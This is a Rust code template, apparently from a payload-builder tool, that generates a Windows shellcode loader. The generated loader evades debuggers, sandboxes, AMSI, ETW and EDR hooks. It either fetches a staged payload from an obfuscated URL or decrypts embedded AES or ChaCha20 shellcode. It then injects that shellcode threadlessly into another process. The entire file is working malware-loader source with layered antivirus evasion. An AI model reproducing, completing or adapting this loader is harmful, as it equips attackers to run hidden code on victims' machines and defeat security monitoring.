#![windows_subsystem = "windows"]
extern crate scaffold;

fn {{ v.fn_run }}() {
    unsafe {
        {%- if "AntiDebug" in feature_names %}
        if scaffold::evasion::anti_debug::is_debugged() { return; }
        {%- endif %}
        {%- if "SandboxDomain" in feature_names %}
        if !scaffold::sandbox::domain::is_domain_joined() { return; }
        {%- endif %}
        {%- if "SandboxUser" in feature_names %}
        if !scaffold::sandbox::usercheck::looks_real() { return; }
        {%- endif %}
        {%- if "UnhookDisk" in feature_names %}
        scaffold::evasion::unhook::unhook_ntdll_disk();
        {%- endif %}
        {%- if "UnhookKnownDlls" in feature_names %}
        scaffold::evasion::unhook::unhook_ntdll_knowndlls();
        {%- endif %}
        {%- if "SleepEncrypt" in feature_names %}
        scaffold::evasion::sleep_mask::masked_sleep_jitter(2000);
        {%- endif %}
        {%- if "AmsiHwbp" in feature_names %}
        scaffold::bypass::amsi_hwbp::install_amsi_bypass();
        {%- endif %}
        {%- if "EtwHwbp" in feature_names %}
        scaffold::bypass::etw_hwbp::install_etw_bypass();
        scaffold::bypass::etw_hwbp::patch_etw_full();
        {%- endif %}
        {%- if "PeCloak" in feature_names %}
        scaffold::evasion::pe_cloak::wipe_pe_headers();
        {%- endif %}

        {%- if is_staged %}
        let mut {{ sg.sg_lv_url }}: [u8; {{ staged_url_len }}] = [
            {%- for b in staged_url_enc %}{{ b }},{% endfor %}
        ];
        for {{ sg.sg_lv_i }} in &mut {{ sg.sg_lv_url }} { *{{ sg.sg_lv_i }} ^= {{ staged_url_xk }} as u8; }
        let mut {{ sg.sg_lv_jwt }}: [u8; {{ staged_jwt_len }}] = [
            {%- for b in staged_jwt_enc %}{{ b }},{% endfor %}
        ];
        for {{ sg.sg_lv_i }} in &mut {{ sg.sg_lv_jwt }} { *{{ sg.sg_lv_i }} ^= {{ staged_jwt_xk }} as u8; }
        let mut {{ sg.sg_lv_ua }}: [u8; {{ staged_ua_len }}] = [
            {%- for b in staged_ua_enc %}{{ b }},{% endfor %}
        ];
        for {{ sg.sg_lv_i }} in &mut {{ sg.sg_lv_ua }} { *{{ sg.sg_lv_i }} ^= {{ staged_ua_xk }} as u8; }
        let {{ v.var_ptr }} = match scaffold::stager::fetch(
            core::str::from_utf8(&{{ sg.sg_lv_url }}).unwrap_or(""),
            core::str::from_utf8(&{{ sg.sg_lv_jwt }}).unwrap_or(""),
            core::str::from_utf8(&{{ sg.sg_lv_ua }}).unwrap_or(""),
        ) { Some(b) => b, None => return };
        for {{ sg.sg_lv_i }} in &mut {{ sg.sg_lv_jwt }} { *{{ sg.sg_lv_i }} = 0; }
        for {{ sg.sg_lv_i }} in &mut {{ sg.sg_lv_url }} { *{{ sg.sg_lv_i }} = 0; }
        {%- else %}
        let {{ v.var_shellcode }}: &[u8] = &[
            {%- for byte in config.shellcode_hex | hex_bytes %}{{ byte }},{% endfor %}
        ];
        let mut {{ v.var_key }}: [u8; 32] = [
            {%- for byte in masked_key_bytes %}{{ byte }},{% endfor %}
        ];
        for {{ v.bin_lv_ki }} in &mut {{ v.var_key }} { *{{ v.bin_lv_ki }} ^= {{ key_tweak }} as u8; }
        let {{ v.var_iv }}: [u8; 16] = [
            {%- for byte in config.iv_hex | hex_bytes %}{{ byte }},{% endfor %}
        ];

        {%- if config.encryption == "Aes256" %}
        let {{ v.var_ptr }} = scaffold::crypto::decrypt_aes256(
            {{ v.var_shellcode }}, &{{ v.var_key }}, &{{ v.var_iv }}
        ).unwrap();
        {%- else %}
        let {{ v.var_ptr }} = scaffold::crypto::decrypt_chacha20(
            {{ v.var_shellcode }}, &{{ v.var_key }}, &{{ v.var_iv }}
        ).unwrap();
        {%- endif %}
        {%- endif %}

        let target_pid = scaffold::inject::ppid_spoof::find_injection_target()
            .unwrap_or(0);
        if target_pid == 0 { return; }
        scaffold::inject::threadless::inject_threadless(target_pid, &{{ v.var_ptr }});
    }
}

fn main() { {{ v.fn_run }}(); }
